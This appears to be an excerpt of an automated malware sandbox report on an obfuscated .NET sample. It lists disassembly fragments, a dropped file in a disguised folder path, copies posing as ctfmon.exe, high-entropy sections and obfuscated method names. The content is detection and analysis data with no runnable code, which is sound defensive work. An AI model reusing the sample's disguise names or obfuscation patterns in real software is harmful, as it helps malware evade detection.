                                    Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exeCode function: 7_2_00007FFD9B8E014B push ss; ret 7_2_00007FFD9B97F349
                                    Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exeCode function: 7_2_00007FFD9B8E186B push ss; ret 7_2_00007FFD9B97F349
                                    Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exeCode function: 7_2_00007FFD9B8E0E5E push ss; ret 7_2_00007FFD9B97F349
                                    Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exeCode function: 7_2_00007FFD9B8E1299 push ss; ret 7_2_00007FFD9B97F349
                                    Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exeCode function: 7_2_00007FFD9B8E0891 push ss; ret 7_2_00007FFD9B97F349
                                    Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exeCode function: 7_2_00007FFD9B8E0494 push ss; ret 7_2_00007FFD9B97F349
                                    Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exeCode function: 7_2_00007FFD9B8E147E push ss; ret 7_2_00007FFD9B97F349
                                    Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exeCode function: 7_2_00007FFD9B8E00A1 push ss; ret 7_2_00007FFD9B97F349
                                    Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exeCode function: 7_2_00007FFD9B8E22DC push ss; ret 7_2_00007FFD9B97F349
                                    Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exeCode function: 7_2_00007FFD9B8E00A1 push ss; ret 7_2_00007FFD9B97F349
                                    Source: Portsessionsvc.exe.0.drStatic PE information: section name: .text entropy: 7.445411118925638
                                    Source: iEIWJugOSvvEyboGDFYpQ.exe.7.drStatic PE information: section name: .text entropy: 7.445411118925638
                                    Source: ctfmon.exe.7.drStatic PE information: section name: .text entropy: 7.445411118925638
                                    Source: 0.3.EjS7Q5fFCE.exe.5300705.1.raw.unpack, WgDGxkD2yWtttoET65H.csHigh entropy of concatenated method names: 'rC9', 'method_0', 'c0C2dAjGEAq', 'sk82dXpeTNd', 'N2dtJD2ukDU5anyLXBPp', 'yqGs8d2u5v2FDfpQiGJn', 'XOWHZp2upCH0mg94jGq4', 'o8jif52uRpVAPTSwrmn7', 'n8jAZt2u7979pslOEQJN', 'bGpt4W2ux9QmFDBsBjCb'
                                    Source: 0.3.EjS7Q5fFCE.exe.5300705.1.raw.unpack, rfA2AjyjScoc2qjjwIw.csHigh entropy of concatenated method names: 'VZq', 'KZ3', 'XA4', 'imethod_0', 'e23', 'YLw2dgcynKF', 'K7V2y23yiSC', 'fT8CDs2swvILcvd2NsNR', 'ROZLKD2ssBW2o5vainu7', 'bakfgT2sv8nGMpQh4bgD'
                                    Source: 0.3.EjS7Q5fFCE.exe.5300705.1.raw.unpack, FbwWikK17HjWWnERbUK.csHigh entropy of concatenated method names: 'Dispose', 'MoveNext', 'get_Current', 'Reset', 'get_Current', 'GetEnumerator', 'GetEnumerator', 'I1eAa52rVu72bfNNdP6q', 'HW7nTu2r3GrOpJsoDuOM', 'OMoXyD2rb0JwS9TGquom'
                                    Source: 0.3.EjS7Q5fFCE.exe.5300705.1.raw.unpack, OoMv4MtiM0pA6jkFG9j.csHigh entropy of concatenated method names: 'OUs2dHyU6X3', 'es4tcmW9lG', 'l10tFJmIbX', 'r2jt3i2YfY', 'hQejwo2kivbSj8cQHQDb', 'V8epTo2kJP28R0EQfV8t', 'sS1qxi2kc8eIOUYnF2nG', 'a0y27f2kFDkvJ9eee0u2', 'GxWlnw2k3B9mNwpVg5TH', 'aeHDRp2kbmS9bJ7cPRyB'
                                    Source: 0.3.EjS7Q5fFCE.exe.5300705.1.raw.unpack, tQdJj5Nm3YUN61UElT.csHigh entropy of concatenated method names: 'eNm6ssZCI', 'oNQ3n4296YvSmg5dM0r7', 'vQHBbq29aeYd9Wt4XiCX', 'GQLWvi29QgUhaDlc3juu', 'Eb4ANxSns', 'rUpX7PnD3', 'Ar6DrSuiC', 'QvmWWILw1', 'bpOEZfeMV', 'lRLonCHSP'
                                    Source: 0.3.EjS7Q5fFCE.exe.5300705.1.raw.unpack, hsAEuHIbWm3Buc9Arfw.csHigh entropy of concatenated method names: 'kTxgYytMme', 'iHriBD2wy4w9Ws4Hk48C', 'w5NKeC2wmlqOQXofqG6L', 'VIJCpV2w0TOn8VZUymiy', 'XxD8bl2wY0TQjjHCttyA', 'KPyfvJ2wIdm2hPA7GeNO', 'fCQIM32wgpTUxsoNR8Sk', 'L4avAy2wdAfIthiVdZDE', 'B8KG2C2wq7DoBl3klah0', 'XqOgZVNe8Z'
                                    Source: 0.3.EjS7Q5fFCE.exe.5300705.1.raw.unpack, HW6aHFAPr4FjLunAd35.csHigh entropy of concatenated method names: 'RsQAKarJSs', 'htKspJ2f8fFGOfl0tbd1', 'S3d7BA2fq4nTBOwd8LPv', 'KCDcMb2fUJXQbqHBJTwm', 'Wttl482fe4tE3cQ9WMWq', 'Iw2AsKiUyY', 'A5RAvZIbQs', 'zd3AaTv74u', 'V16uby2fmEhF5m7H9SVk', 'jXZdqC2f0Nw8p172ABHy'
                                    Source: 0.3.EjS7Q5fFCE.exe.5300705.1.raw.unpack, YjhQ34dUUWdJqY9GsE6.csHigh entropy of concatenated method names: 'aL0de5cUb5', 'FBddnOuyoH', 'TpAdl5yBaL', 'wnXPVT26oJebLVL5XZZD', 'tBPuLA26HdoMcXehkG50', 'KdkBT126WekEYoUBH0mH', 'd43Fte26E7ASYid4raMr', 'LpcmIs26jBXkw1Abv00y', 'RLFaGi269Sxqa6R90r0a', 'CN2aFB26ClyXcNStyKuR'
                                    Source: 0.3.EjS7Q5fFCE.exe.5300705.1.raw.unpack, jWHm3l0604kjATqG9Xk.csHigh entropy of concatenated method names: 'P83', 'KZ3', 'TH7', 'imethod_0', 'vmethod_0', 'S1h2dUnKbEG', 'K7V2y23yiSC', 'j6HCO72aJuCqIiyH8Sue', 'p7h0Vq2acAu3EiLg4NG7', 'LFMrMM2aFRalbZUMHpY4'
                                    Source: 0.3.EjS7Q5fFCE.exe.5300705.1.raw.unpack, AHUTkiwvJVFKxYeZHUu.csHigh entropy of concatenated method names: 'DB4', 'method_0', 'method_1', 'method_2', 'method_3', 'method_4', 'method_5', 'A47', 'fC4', 'aK3'
                                    Source: 0.3.EjS7Q5fFCE.exe.5300705.1.raw.unpack, nXSHg9Xlf7DJN4RpgP4.csHigh entropy of concatenated method names: 'NhXXXLm9Cp', 'YHKcp02uZCYl0ENn8UFj', 'bu8rgE2u2Il2iWh56Arh', 'pmyUY52f4TiRAKqBNQja', 'lnI4gT2fzl4Xp1e74j9I', 'b1iTnC2uInY8rN2Z4JkO', 'nA4XLBKK0u', 'FWqloK2fpY4VZV9Cp9Xp', 'DJVFBB2fkFBCVt7cpPf6', 'qiFyFI2f58nm7MRLhEDE'
                                    Source: 0.3.EjS7Q5fFCE.exe.5300705.1.raw.unpack, AkoqAkPrhcvqaEMIRlI.csHigh entropy of concatenated method names: 'QFkP5J56vd', 'PbPPp5wnmS', 'AC8PRFfVM7', 'gWnP73rL8y', 'P8bPxuhgYV', 'fJ2wJx2FgCHxZDVaK4hk', 'Fmk9k32F2rp9CHjbheOf', 'sPSQwV2FI1AZ7bmFqa0u', 'qVESld2FypbFRbFS0BlS', 'JGWXlS2FmgKkDA4YEWr3'
                                    Source: 0.3.EjS7Q5fFCE.exe.5300705.1.raw.unpack, JsyYdHP40mmbJAN8wo6.csHigh entropy of concatenated method names: 'o3kwZctGJQ', 'XLdw2n837B', 'xqTwIPKXse', 'GX7wgpt3PL', 'vQdwyOHnhR', 'ca0wmhYTJR', 'qUIZud2F8P3oE3WyVKA3', 'bZcBBI2FqZbndooXXOyC', 'fmOVJt2FUydh0QNnFvHO', 'i3m9v52Fe9XrE5HNpBV0'
                                    Source: 0.3.EjS7Q5fFCE.exe.5300705.1.raw.unpack, rj73Ft6bjwFI3K7R7CF.csHigh entropy of concatenated method names: 'XSNZQO2rDgqdZvmFYOBE', 'bae3mL2rAnRtOKybnIqP', 'u0NlYH2rX17tMJKOE2r9', 'ThGTRs2rW4KTDJmF73d9', 'N3f6r9eWQZ', 'Mh9', 'method_0', 'Y7S6klTyVQ', 'uFq65c6baV', 'Svp6paa0Lg'
                                    Source: 0.3.EjS7Q5fFCE.exe.5300705.1.raw.unpack, Pg35RcY2OqpQtfSYmVf.csHigh entropy of concatenated method names: 'yr0YgenwM1', 'qDlYyOGUUg', 'bxfYmZLuB8', 'JCZc412Q8lNJ4y40KHeA', 'j2cYwP2QqixBXKtRd16N', 'LuNlEc2QUjpi0FhS2jcx', 'pTCUYD2Qe1qbDJVT6OXi', 'IPn2V62QnpU4TWPo3xqF', 'T8xACZ2QlIqqNSMy6aoF', 'WtOXDk2QGiHRF2KApnyD'
                                    Source: 0.3.EjS7Q5fFCE.exe.5300705.1.raw.unpack, XT37q29vFnrwgRB2BBt.csHigh entropy of concatenated method names: 'method_0', 'RUI9QuRoEW', 'o2m96p1rap', 'q7f914ZguD', 'PLj9KZV0WM', 'Nqa9MIYT8G', 'rT49tLu9eW', 'L7fk8J2J1UPVVRqDRoBo', 'qdLFwU2JQyFAlA4TqDh2', 'qQsI4U2J6OTfo3XkKt15'
                                    Source: 0.3.EjS7Q5fFCE.exe.5300705.1.raw.unpack, zaZ0YfAkuIw6HegpZX5.csHigh entropy of concatenated method names: 'm1I', 'G4q', 'w29', 'IN22dn2LZH2', 'Df72yJ28YuA', 'JqYqia2fsXNWFaAoM4fe', 'hRajvF2fvuCZj4fAPoaD', 'zmZCJo2faaubpZg4OyFs', 'GxBAHg2fQ7h7OWXsmTDH', 'gQGaBw2f6mJf6GMZaU0V'
                                    Source: 0.3.EjS7Q5fFCE.exe.5300705.1.raw.unpack, CfAecytqfujxxU8Luys.csHigh entropy of concatenated method names: 'pj4tHuYfYZ', 'Wsw7x42kauMRDQd5mCVr', 'rZ1Ui32kQe50RS4esZ5t', 'rxjg4s2ksRyTL4FU5B6D', 'qqFsRD2kv2ElHDbZ3Uyf', 'mYbUNA2k6k3u1HLLFl3E', 'IPy', 'method_0', 'method_1', 'method_2'
                                    Source: 0.3.EjS7Q5fFCE.exe.5300705.1.raw.unpack, iC9iJ2s40mBbr836qpX.csHigh entropy of concatenated method names: 'KfJvZWqqCd', 'A5Bv2n6kca', 'Yd7', 'GNxvINM51Y', 'U7gvgdd82R', 'm1EvyDYKW1', 'wUyvmShiob', 'BrLT862bqQXhla88EkbI', 'utwBpF2bU4pvS2CcnJjZ', 'vOVSuS2b8LyujaGA0CKO'
                                    Source: 0.3.EjS7Q5fFCE.exe.5300705.1.raw.unpack, TSLPXZxSm9iEaDAau7u.csHigh entropy of concatenated method names: 'zhp20aVPEdi', 'D5Q20QQaZhx', 'HJB206k29we', 'qJ8201qaew4', 'Oro20K6Vf2b', 'YDp20MI8Mk2', 'pqc20tuQ9xl', 'gTY4mw0X4T', 'BV220S3WpXk', 'klS20fndsVM'
                                    Source: 0.3.EjS7Q5fFCE.exe.5300705.1.raw.unpack, McIVxKwfrIRMfforS7r.csHigh entropy of concatenated method names: 'qPdwhVe2yS', 'OOywBiNkq0', 'qcpwicwFAF', 'uJgwJOhZmy', 'BJQwcQUc3w', 'vyEwFwTqQY', 'p3Pw3TgwVj', 'J11wbAiqoj', 'P7FwVJrPv6', 'poIwrXjGAu'
                                    Source: 0.3.EjS7Q5fFCE.exe.5300705.1.raw.unpack, wyBPKNGEtagDJ1ctY0C.csHigh entropy of concatenated method names: 'XYBAn1RE1H', 'ShYAlw98vy', 'Gq90pK2SVYFRxIL2bP4s', 'fPutLj2S3Cxrx9r5BnWm', 'WbYo0r2SbXMBVFtMK3db', 'EWcpKa2SrAEFJ3sR1kDg', 'lradqO2Skbcht2118X58', 'LIGAARcDeR', 'MvM1h52S738tsj87mtS5', 'SKahxL2SpQ8IU6O2KiwS'
                                    Source: 0.3.EjS7Q5fFCE.exe.5300705.1.raw.unpack, mtHJExmqLjcHW3q7dic.csHigh entropy of concatenated method names: 'Rpx', 'KZ3', 'imethod_0', 'vmethod_0', 'rd82dmCH8IX', 'K7V2y23yiSC', 'wLMgd82vA5BiKOYVqakN', 'g8T9eF2vXtMTVY15dvEq', 'M32xfE2vD3tKDd1tDQpi', 'f5N1sL2vWVJBnpM8aUth'
                                    Source: 0.3.EjS7Q5fFCE.exe.5300705.1.raw.unpack, WHpYJQDLLNx1Eh0nRFp.csHigh entropy of concatenated method names: 'gKJFss2h6AwRR0EK2JCS', 'MF17FT2h1OPA6EN5U9uG', 'Awtedc2ha255HkZQL152', 'Eq18jv2hQSQFNAYXCuuL', 'method_0', 'method_1', 'P2TDNu35FM', 'T11DTvFmhh', 'cl0DAicquH', 'Bg8DXYtDFx'
                                    Source: 0.3.EjS7Q5fFCE.exe.5300705.1.raw.unpack, rYFE3bIvrpW8L7mgamJ.csHigh entropy of concatenated method names: 'MdfIup0uLt', 'Ls4Ihx6DEc', 'Tiyw4M2PhxTDiuZTVPBd', 'du0UFq2Pf3N27bRRbwdc', 'tXZJlf2PuA546abFHrmt', 'rh3aKc2PBG68e9sAGTeX', 'G21IchmPJo', 'tyuhXS2PFJtB3ra4UdlJ', 'eRSKud2PJxdm2p1ek7NE', 'VTbGVZ2Pc79VwGmyvT5Y'
                                    Source: 0.3.EjS7Q5fFCE.exe.5300705.1.raw.unpack, yDaau4dJohhkN85ktBd.csHigh entropy of concatenated method names: 'mDCdpn6cSF', 'c5Gtnu21eDa1SapV3OZJ', 'JrEcjc21nBhNYH1p1Wvn', 'vfphcG21lmV3PKLs9M4t', 'M7Zgnk21GWSxZmpfSwxN', 'P9X', 'vmethod_0', 'DhB2yCoUaQB', 'imethod_0', 'Dtgf5t21qWcDOCWdLGPl'
                                    Source: 0.3.EjS7Q5fFCE.exe.5300705.1.raw.unpack, K5InK7XBaYtKnTNPSM8.csHigh entropy of concatenated method names: 'kFoXJuWwHc', 'oqCXcjhFjS', 'z5TXFABn3J', 'uSItOf2uwUfp66Y9AcFd', 'S83scm2uCSZKKbILsftQ', 'JZY9px2uPeno7Ug0Kgmp', 'phq1B22uslcsL8wtTxAc', 's8uDbL2uvQ8byr0q0R9I', 'MZW4qO2uayWLX87TLZ7P'
                                    Source: 0.3.EjS7Q5fFCE.exe.5300705.1.raw.unpack, skYCSpXprG7VSo9QaTy.csHigh entropy of concatenated method names: 'w52', 'o38', 'vmethod_0', 'GjNX7YOefV', 'TK22dT3WoGW', 'fqZn7c2ucochMmN8beYD', 'B5bn932uiksHf6mRHHLS', 'vgcrn42uJe17tSkqP25Y', 'cMDeSJ2uFH1kcCXVvONZ', 'KxwDwu2u3alLWFcDO9nV'
                                    Source: 0.3.EjS7Q5fFCE.exe.5300705.1.raw.unpack, IWmKVFzfHVDuyM4m61.csHigh entropy of concatenated method names: 'luI22GvI8T', 'vsq2gA7sLL', 'Ecw2yS2Mvm', 'iqU2mVwKcp', 'fUe20YoEeQ', 'PPL2Y2PXEO', 'uEG2qhPcVy', 'LKnuFd2CUTka0u7dySj2', 'auuk8Z2C8VM5OJH40leh', 'Ymvs8j2CequMPVL3E4Kx'
                                    Source: 0.3.EjS7Q5fFCE.exe.5300705.1.raw.unpack, ACrIJ9kvcpoEgCucdJF.csHigh entropy of concatenated method names: 'method_0', 'h59', 'R73', 'BS1kQTRipI', 'rV7vvr2pR0R6qnI50hdg', 'TKhNVy2p7X4EgYqvr37d', 'qjQvwK2pxCEijOyJkyFU', 'puCFL92p4bQ7hdfCG5DB', 'GqpZcv2pz6W6e3sHcan6', 'jZDcAR2RZ3SH01uMUoaq'
                                    Source: 0.3.EjS7Q5fFCE.exe.5300705.1.raw.unpack, s6PXDpXtF0MVI8tlLTA.csHigh entropy of concatenated method names: 'N2N', 'H762dGsmxi3', 'RFHXfH5WUf', 'j1q2dLmGRAB', 'nvXw8R2uWIqPWguCbtAA', 'MS2Lv82uXxUZEkxZq2ic', 'SULWYN2uDjkXsBNDcAv4', 'Ta1sBG2uEy6WZYI0DLmQ', 'VaR8pE2uoXYrsJPRv2eB', 'cqoeIq2uHqBGElX2E7G4'
                                    Source: 0.3.EjS7Q5fFCE.exe.5300705.1.raw.unpack, gPIGJGRNbTd3Z8flbUb.csHigh entropy of concatenated method names: 'zKHiu32xOdSIF2fyHlf7', 'OD68bk2xN2O0Pk0gv6TR', 'VDC7kcxQ2s', 'CelSxm2xDhcMDtZdkZWh', 'HSrMiU2xW8aRuoLxvEwG', 'g5SJc32xEgAKBKFyWHvY', 'YtGONk2xouc7eXwFb0B4', 'g39edx2xHqTpTI0J4Lxs', 'm8Jdua2xjj991RmR3RZw', 'quiQlP2x97bLNBt5qHCZ'
                                    Source: 0.3.EjS7Q5fFCE.exe.5300705.1.raw.unpack, wM5lO398lmo4aVsRj4v.csHigh entropy of concatenated method names: 'Su49nNO1OW', 'BhL9ltJ06v', 'tFM9GZiBFy', 'Chr9LPeq8f', 'jgk9OK8rCF', 'Jubogq2JodYMRON2L4Pr', 'sGoglC2JWh6M3wT3IZcb', 'XsZ9OS2JE6nxkY0exrBD', 'OHAd0k2JHrF3i5JGhxVI', 'CpEIEv2JjyqTp4mIXP9I'
                                    Source: 0.3.EjS7Q5fFCE.exe.5300705.1.raw.unpack, Lae65rYAET89QVW3Bnx.csHigh entropy of concatenated method names: 'VI6YP6TjpK', 'H6Lc772QFlbIgBR93L0a', 'b1bN0d2Q3BVgmKvLGm6I', 'fwJTGU2QJsH4OCOaVcg3', 'rgZCsa2QcqEMkpu6REuM', 'ww9eEy2QbTmKyO1Xd2Tb', 'iJtYD7WJHP', 'o6cYW8V589', 'auOYEUNXnP', 'jKcYoLunkh'
                                    Source: 0.3.EjS7Q5fFCE.exe.5300705.1.raw.unpack, eYVGU20ukkiepvkgBKl.csHigh entropy of concatenated method names: 'Fkc0pgZEKC', 'daQ0RGxeE9', 'xXC07J8BP7', 'BQ3uVv2Q0xc3YfJ6kcij', 'uv7y6V2Qy4FNkB2Hfhyo', 'RkZt5p2QmdxFOut19Qk1', 'OjbyQ02QYeP78Y1vpQcF', 'nS10BdRc0n', 'MhC0iOh7Ge', 'ygR0JhhSy1'
                                    Source: 0.3.EjS7Q5fFCE.exe.5300705.1.raw.unpack, uGpo0ZAtERfDOYJtGqu.csHigh entropy of concatenated method names: 'QaPAJR0GlJ', 'XxhAc0e7rY', 'oUeAFThyP3', 'bbXtNA2fXItbqG3ktREC', 'mciijQ2fDaioI0XsYmSy', 'oE7DDB2fT2Wri5NdvFOb', 'M4R1tF2fAgCO5cu8VY5T', 'dPlAftIAG4', 'TTsAuSM6Uo', 'U41AhTo4AY'
                                    Source: 0.3.EjS7Q5fFCE.exe.5300705.1.raw.unpack, kRTTRPIXM6Rw7o9Fu5b.csHigh entropy of concatenated method names: 'fGJIWMBxtU', 'NUIIEBPfkb', 'SoarLT2PPZPKEGf5ZDnk', 'L6mqlv2P9IGRE4mTioL0', 'GA6EXi2PC3bZlcCMFyuZ', 'lrV8Ug2Pwr412vCYTmQi', 'vyd1AD2Psc4HkqjYNbhC', 'xv4OD92PvXvZ0nNcqp5F', 'Rwpu9F2PaSZmX8sf6qCp', 'ebvotK2PQl3segjBCwos'
                                    Source: 0.3.EjS7Q5fFCE.exe.5300705.1.raw.unpack, zlFQmZoVGbZY7gKYC6H.csHigh entropy of concatenated method names: 'dpMokdciig', 'n53o5qtsex', 'NOoopGUUMt', 'InuoRROIxQ', 'B8Vo7pYjiL', 'QEpGAy2iyaylE44uW9v7', 'QGu6dh2iIiwsoGJsfNvn', 'J0aGAH2igl0Nh16vj3qn', 'iqw7NE2imfssR1aZywiO', 'sSe2WC2i0INOFpejtOx3'
                                    Source: 0.3.EjS7Q5fFCE.exe.5300705.1.raw.unpack, RoO5lEvdU0wKXZ9LI70.csHigh entropy of concatenated method names: 'fr9vUoa1xs', 'uAnv8uCXEE', 'method_0', 'method_1', 'I27', 'c6a', 'C5p', 'l9jveRasFK', 'method_2', 'uc7'
                                    Source: 0.3.EjS7Q5fFCE.exe.5300705.1.raw.unpack, OQxOZvySYqaQwpBJSR2.csHigh entropy of concatenated method names: 'Yltyx8LKsv', 'UbUEA02v0HkvQFyFySLQ', 'boQsl52vYcsqyY5xUjeD', 'EaxihF2vyekGkaXkZ23D', 'oMfHCa2vmbgCNujw9cLO', 'JPZrS32vqvtQNncZi0F8', 'qdB9E02vUjKrMVNe5qZe', 'ul8FoN2v8O0HFWoZA9Y5', 'mpfm0CRUlT', 'dmGKp72vGCMVIPS2NQA6'
                                    Source: 0.3.EjS7Q5fFCE.exe.5300705.1.raw.unpack, eg5dorX3QobRqwYbBVr.csHigh entropy of concatenated method names: 'Bdt2dOwdjj1', 'lv0XVqSsGS', 'lO92dN55RmO', 'FyPBY22uKMFXpGZwmppP', 'lMbpvD2uML8C14DHg6ot', 'pUROpH2u6QwnUi0W3JPy', 'znWU272u1lVRBqli9FZw', 'xGe3Q52utos2q4BewXYT', 'Wq6AIQ2uSp7l3uox3AMI', 'yiTp2R2uf2rTtJY9uuco'
                                    Source: 0.3.EjS7Q5fFCE.exe.5300705.1.raw.unpack, UU0gQIql19adeUOJBQR.csHigh entropy of concatenated method names: 'q76', 'method_0', 'p9e', 'hkB', 'method_1', 'method_2', 'l2apCB21SPpKFGaCPEFb', 'uJRfWk21fmcZ14UjNeJA', 'LOb3rA21uPo0ZytGTUq0', 'VlYqLp2PPZ'
                                    Source: 0.3.EjS7Q5fFCE.exe.5300705.1.raw.unpack, L4OKt6dOKIjbFhUFw3I.csHigh entropy of concatenated method names: 'vbbdXqOKQG', 'K7uja026MD3VVYXiM0Mg', 'P3BSoh261pbPJZr2CK0r', 'aBhNAM26K0XRq5mKFVyk', 'fasdT5Jyro', 'CZSkhM26v8LBPp9xeyq5', 'xbJVeH26aTYuAsv0pblo', 'Ncowwn26wsAo6XawYiUl', 't8IdVB26s577R4jOvKr7', 'KLCEZ726QnWmC3pjneU2'
                                    Source: 0.3.EjS7Q5fFCE.exe.5300705.1.raw.unpack, blt6xEYqdhBAUO82MDo.csHigh entropy of concatenated method names: 'xKHY80JtTJ', 'DKCYecXV8N', 'ljEtrb2QXIxMrHiP8aGv', 'Ya03Cv2QTfFmYNg2FjDM', 'xVvTAb2QAv54Iplu6EdR', 'MT7kPl2QDyCHGTfPcwDD', 'IqtOMu2QW3bbSNwp9in1', 'pFhp542QEhKDj9MaCl2u', 'YR7x0Y2QoouOXQWe1rlr', 'k3GFsf2QHPFZ0ctLrPOR'
                                    Source: 0.3.EjS7Q5fFCE.exe.5300705.1.raw.unpack, KvFquTdCtlFmVGm43hY.csHigh entropy of concatenated method names: 'D69dwNXung', 'RxjdsaaRSC', 'YDrdv50emH', 'JcodauNGb7', 'oJZdQqox7O', 'qdCd6RlOUr', 'r8IHeQ26kiPaNjvRmZAR', 'x6I1Z3265KT6JC04ZsdA', 'viQekI26pZjYbvL8IpDU', 'VE3peb26RlXMq8mSXBOk'
                                    Source: 0.3.EjS7Q5fFCE.exe.5300705.1.raw.unpack, QScBSpoUF7B9JkuS5PR.csHigh entropy of concatenated method names: 'jQCovh1n2n', 'TKBoecqXmE', 'GAmongcelD', 'ey6oloPZyP', 'KQAoGRcbMR', 'CTToLqrnsF', 'zsOoOqUUDe', 'a8PoNbRadi', 'TK8oTKa9m9', 'j3LoALCMs6'
                                    Source: 0.3.EjS7Q5fFCE.exe.5300705.1.raw.unpack, lvWI7xYujmbx7Kfbavk.csHigh entropy of concatenated method names: 'f7UYpIlaPo', 'hSyYRKjEgT', 'z6LvhO268wxCSVOqw8Km', 'lXEjb226eUXWmJPo3Wve', 'DEOQTb26ngeW7ybq0lvp', 'UB5YBsu6ld', 'hBXYiErERl', 'rUMYJAL9xj', 'lUeYc2TIh8', 'ihIYFvC5P9'
                                    Source: 0.3.EjS7Q5fFCE.exe.5300705.1.raw.unpack, mGYX6iCuyYEBASY6hNx.csHigh entropy of concatenated method names: 'nhKCxDsY8Z', 'i55CzkmekL', 'I6ACBaepAM', 'VCPCia8kS4', 'UMMCJiMLBc', 'BLZCcxnnrY', 'DmdCFnhNcU', 'LvsC3fk8YM', 'GV0CbgXUJ3', 'meZCVkH4iS'
                                    Source: 0.3.EjS7Q5fFCE.exe.5300705.1.raw.unpack, ickxQJaDDBQq2kyr7h1.csHigh entropy of concatenated method names: 'vdlQlPBX5u', 'r9M1NI2V0wmaVh17eyDt', 'xkC5kh2VyhABJgTTYZjh', 'Ae9Jat2Vmhw8RFclDfMH', 'kt5', 'y42aE2mEuN', 'ReadByte', 'get_CanRead', 'get_CanSeek', 'get_CanWrite'
                                    Source: 0.3.EjS7Q5fFCE.exe.5300705.1.raw.unpack, zTgVwif1xxQVT7Abbau.csHigh entropy of concatenated method names: 'GJS1YP2pYrxfXi1SN0Hx', 'Gj47472pdKirXtpY1qfJ', 'iAJexY2pmiBL1hOIC8ME', 'BFKI9r2p08nfihUOrQto', 'h2oxmo2p2G2yjTadYM14', 'URwjha2pIJvIw5mCh4eH', 'kq2GS22pgGYmNffvGyIe', 'jpdlSJ25zl5tsWwYAEKg', 'a1VCiA2pZuWB7lh37ICo'
                                    Source: 0.3.EjS7Q5fFCE.exe.5300705.1.raw.unpack, MtSm9esiSKvHPIrjjtM.csHigh entropy of concatenated method names: 'HykscUm8Id', 'siLsFiSlXF', 'sYws3KMXSH', 'wGRsb0UtBZ', 'LpasVgi1Ti', 'ArjWiq234PckUFaJXnwO', 'JHGZOD23zR9nUPb0d09p', 'XRx624237G5oGDorbPO3', 'WN7Dcs23xB4D5x2WsbWq', 'HObF1V2bZAanqsOvMosX'
                                    Source: 0.3.EjS7Q5fFCE.exe.5300705.1.raw.unpack, f8IvbHWnBDwhCWcDD1c.csHigh entropy of concatenated method names: 'GsRo2k0xLk', 'x2fOac2BhkmQfc22lohm', 'hRb8XR2BfdtnajNSNSq7', 'LhWsQ42BuOHaluXdBIdE', 'yt1qi12BBQ6jdJNN588p', 'MJtWGAwCM1', 'FcxWLjQDxp', 'QVnWOUyohy', 'UCuWNx3eDk', 'IG1WTGUGwP'
                                    Source: 0.3.EjS7Q5fFCE.exe.5300705.1.raw.unpack, Ty1fK4qIF8ERWMLx1Lt.csHigh entropy of concatenated method names: 'q4mqyNNF4I', 'XHJqmLFYbd', 'GOAq0JOXKr', 'babqYsBqD6', 'f1WqdUb5n1', 'aWcqqC3qn8', 'otgqUmosnI', 'gkPq82gG7g', 'uaYqemNWXY', 'dfxqn7OD7w'
                                    Source: 0.3.EjS7Q5fFCE.exe.5300705.1.raw.unpack, Srks6KmLr7VhKT28xeW.csHigh entropy of concatenated method names: 'k0xmC1Gmvx', 'ChfmPxEVda', 'S43mwbmUY6', 'wEeALm2viomtmGuyhZQs', 'AcnQcB2vJCsgBasoccKj', 'TZpxoG2vhaswYRm9plC3', 'r4oTg12vByIifZsuAbva', 'v0lmo5KNkv', 'uphmHncp6V', 'XoIlFZ2vSFnpjAvyAbLb'
                                    Source: 0.3.EjS7Q5fFCE.exe.5300705.1.raw.unpack, WVhPeoCgOpZmtleEi2F.csHigh entropy of concatenated method names: 'method_0', 'YU8', 'method_1', 'method_2', 'rUMCmvhann', 'Write', 'd7ZC0QZ1CR', 'CGSCYkZ6CV', 'Flush', 'vl7'
                                    Source: 0.3.EjS7Q5fFCE.exe.5300705.1.raw.unpack, osnNcFD8crq3ekDOJi3.csHigh entropy of concatenated method names: 'Rrr', 'y1x', 'zFr2dWmZp01', 'sM02dEPCDBF', 'wUd7ZX2hdJ97TYZTZIuJ', 'xXRHns2hqlhfURX4cXqO', 'H63gvZ2hUZ7QuaF0njtb', 'skN6Rj2h8GiVH8AioKV1', 'qMC26A2he8F5ZLo9Befs', 'w6ta4R2hn4LqDUixF4W7'
                                    Source: 0.3.EjS7Q5fFCE.exe.5300705.1.raw.unpack, QSv13CImiI5o3mmfKnV.csHigh entropy of concatenated method names: 'tA0IYl1i7Z', 'B4XIdKN6qs', 'gscIqEL90D', 'CrYIUL2XL1', 'iJZfSr2PGQaY4sGiBCkR', 'S62RJf2Pn3LrGSdgUWMD', 'eYt4IL2PlN0LSChYDIPw', 'MDqinf2PLE5psvwX86wx', 'scCZQf2POADamm3I6BMb', 'sK3e8N2PN5GR0R1j2IG2'
                                    Source: 0.3.EjS7Q5fFCE.exe.5300705.1.raw.unpack, J8AjFSQbgy1ZtjU95ZZ.csHigh entropy of concatenated method names: 'bXFQrZZZ5A', 'k6r', 'ueK', 'QH3', 'nASQke2j4Q', 'Flush', 'Rk3Q5BP84x', 'tZGQpCFD4s', 'Write', 'kwOQRewNRc'
                                    Source: 0.3.EjS7Q5fFCE.exe.5300705.1.raw.unpack, TbjJIF2kdl3JWNwk36X.csHigh entropy of concatenated method names: 'P9X', 'HLj2pRrceP', 'eC52dZea1VQ', 'imethod_0', 'ltC2R0X7Wp', 'qZZCIS2CRUYY8pPIVVb4', 'nLHAmZ2C5RlHbk6OJ7cP', 'SpOV0y2CpSQdcNMGJ3qG', 'fxAhCo2C7lD5PE4aAE7D', 'F2mNBe2CxATVPJdRnmf0'
                                    Source: 0.3.EjS7Q5fFCE.exe.5300705.1.raw.unpack, l88VT8Q1eosOgU4Enya.csHigh entropy of concatenated method names: 'Close', 'qL6', 'Fs4QMoXri8', 'iDMQtCrYlF', 'prMQSgpEJ7', 'Write', 'get_CanRead', 'get_CanSeek', 'get_CanWrite', 'get_Length'
